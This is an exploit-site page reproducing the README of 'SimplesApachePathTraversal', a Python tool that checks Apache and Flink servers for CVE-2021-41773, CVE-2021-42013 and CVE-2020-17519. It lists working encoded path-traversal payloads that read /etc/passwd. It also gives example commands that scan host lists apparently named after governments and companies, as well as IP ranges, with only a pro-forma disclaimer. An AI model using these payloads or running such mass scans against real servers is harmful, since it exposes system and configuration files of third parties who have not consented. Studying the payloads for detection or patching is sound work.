Sploitus

Exploit for SimplesApachePathTraversal

kitploit Β· 2026-08-27

Exploit Code

MARKDOWN183 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MRCL0WNLAB-SIMPLESAPACHEPATHTRAVERSAL
# SimplesApachePathTraversal

![Banner Simples Apache Path Traversal](https://assets.kitploit.com/production/public/readmes/38116/7432bd48b839ef58a5c290a788701fd0db83903485597116523b5ed69f7330ba.png)

#  Simples Apache Path Traversal 

It's a simple tool for test vulnerability Apache Path Traversal  
https://blog.mrcl0wn.com/2021/10/uma-simples-tool-para-apache-path.html   
  
![GPL License](https://img.shields.io/github/license/MrCl0wnLab/SimplesApachePathTraversal?color=blue) ![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/MrCl0wnLab/SimplesApachePathTraversal) ![Python 3.8](https://img.shields.io/badge/python-3.8-yellow.svg) ![Supported_OS Linux orange](https://img.shields.io/badge/Supported_OS-Linux-orange.svg) ![Supported OS Mac](https://img.shields.io/badge/Supported_OS-Mac-orange.svg)

root@kitploit:~
    
    
    Autor:    MrCl0wn
    Blog:     https://blog.mrcl0wn.com
    GitHub:   https://github.com/MrCl0wnLab
    Twitter:  https://twitter.com/MrCl0wnLab
    Email:    mrcl0wnlab\@\gmail.com
    
    Gr33ts:
    + aCCESS Security Lab @exchangesec
       - Megarushing, Ofjaaaah, 5Ub5010, Gh05tPT, Hunt3rPl4nk
    

### Path traversal (software bug)

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with β€œdot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).

## Disclaimer

root@kitploit:~
    
    
    This or previous program is for Educational purpose ONLY. Do not use it without permission. 
    The usual disclaimer applies, especially the fact that me (MrCl0wnLab) is not liable for any 
    damages caused by direct or indirect use of the information or functionality provided by these 
    programs. The author or any Internet provider bears NO responsibility for content or misuse 
    of these programs or any derivatives thereof. By using these programs you accept the fact 
    that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these 
    programs is not MrCl0wnLab's responsibility.
    

### This script checks for vulnerabilities

  * CVE-2021-41773 
  * CVE-2021-42013
  * CVE-2020-17519



## Commands

root@kitploit:~
    
    
    python main.py --file gov.br.txt  --thread 15
    python main.py --file tesla.txt  --ssl
    python main.py --range 192.168.15.1,192.168.15.100 --thread 30 
    python main.py --file fbi.gov.txt  --thread 15 --timeout 3 
    python main.py --file gov.ru.txt  --debug
    

## Screenshots

![Screenshot](https://assets.kitploit.com/production/public/readmes/38116/5808e2d500e3069c1c4c44592c6dad02a9e2fd160127e5f55ec1cfb22836ee5e.png) ![Screenshot](https://assets.kitploit.com/production/public/readmes/38116/f446988821df15e19b2d4509002704a910e7ecba42d2c3be8fd2875908684431.png)

## Flow to generate targets

![Screenshot](https://assets.kitploit.com/production/public/readmes/38116/fa137b1fdb7bd9a6a678a657fdde51a909fee51440a9a0c8ce851b4354763544.jpg)

## Help

root@kitploit:~
    
    
    python main.py --help
    

root@kitploit:~
    
    
     
                                       .,,
                                      (=\/\
                                       \=\/\
                                        \=\/\
                                         `=\/
                                            \                                                                                                                  
               simples [ APACHE ]
               ___      _   _       _____                                    _ 
              / _ \__ _| |_| |__   /__   \_ __ __ ___   _____ _ __ ___  __ _| |
             / /_)/ _` | __| '_ \    / /\/ '__/ _` \ \ / / _ \ '__/ __|/ _` | |
            / ___/ (_| | |_| | | |  / /  | | | (_| |\ V /  __/ |  \__ \ (_| | |
            \/    \__,_|\__|_| |_|  \/   |_|  \__,_| \_/ \___|_|  |___/\__,_|_|
                                                                       
                  
                          By: MrCl0wn / https://blog.mrcl0wn.com
                                        https://twitter.com/MrCl0wnLab 
                                        https://github.com/MrCl0wnLab                                                                         
             
    usage: tool [-h] [--file <ips.txt>] [--range <ip-start>,<ip-end>]
                [--thread <20>] [--ssl] [--timeout <5>] [--debug]
    
    [!] Check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519
    [!] File exploits: /assets/exploits.json
    [!] Output: output/vuln.txt
    
    python main.py --file gov.br.txt  --thread 15
    python main.py --file tesla.txt  --ssl
    python main.py --range 192.168.15.1,192.168.15.100 --thread 30 
    python main.py --file fbi.gov.txt  --thread 15 --timeout 3 
    python main.py --file gov.ru.txt  --debug
    
    optional arguments:
      -h, --help            show this help message and exit
      --file <ips.txt>      Input your target host lists
      --range <ip-start>,<ip-end>
                            Set range IP Eg.: 192.168.15.1,192.168.15.100
      --thread <20>, -t <20>
                            Eg. 20
      --ssl                 Enable request with SSL
      --timeout <5>         Set connection timeout
      --debug, -d           Enable debug mode
    
    

## Tree

root@kitploit:~
    
    
    .
    β”œβ”€β”€ assets
    β”‚Β Β  β”œβ”€β”€ autor.json
    β”‚Β Β  β”œβ”€β”€ config.json
    β”‚Β Β  β”œβ”€β”€ exploits.json
    β”‚Β Β  └── prints
    β”‚Β Β      β”œβ”€β”€ banner.png
    β”‚Β Β      β”œβ”€β”€ print01.png
    β”‚Β Β      └── print02.png
    β”œβ”€β”€ LICENSE
    β”œβ”€β”€ main.py
    β”œβ”€β”€ modules
    β”‚Β Β  β”œβ”€β”€ banner_mrclw.py
    β”‚Β Β  β”œβ”€β”€ color_mrclw.py
    β”‚Β Β  β”œβ”€β”€ debug_mrclw.py
    β”‚Β Β  β”œβ”€β”€ file_mrclw.py
    β”‚Β Β  β”œβ”€β”€ __init__.py
    β”‚Β Β  β”œβ”€β”€ request_mrclw.py
    β”‚Β Β  β”œβ”€β”€ shodan_mrclw.py
    β”‚Β Β  └── thread_mrclw.py
    β”œβ”€β”€ output
    └── README.md
    

## File exploit

> assets/exploits.json

root@kitploit:~
    
    
    {
        "CVE-2021-41773": "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
        "CVE-2021-42013-0": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd",
        "CVE-2021-42013-1": "/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
        "CVE-2021-42013-3": "/cgi-bin/.%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
        "CVE-2021-42013-4":"/cgi-bin/%25%25%25%2e/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd",
        "CVE-2020-17519-0":"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
        "CVE-2020-17519-1":"/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
    }
    

### Ref.

  * https://owasp.org/www-community/attacks/Path_Traversal
  * https://appcheck-ng.com/apache-path-traversal-vulnerability-cve-2021-41773/
  * https://www.exploit-db.com/exploits/50383
  * https://www.exploit-db.com/exploits/50406
  * https://www.exploit-db.com/exploits/49398
  * https://owasp.org/www-community/attacks/Path_Traversal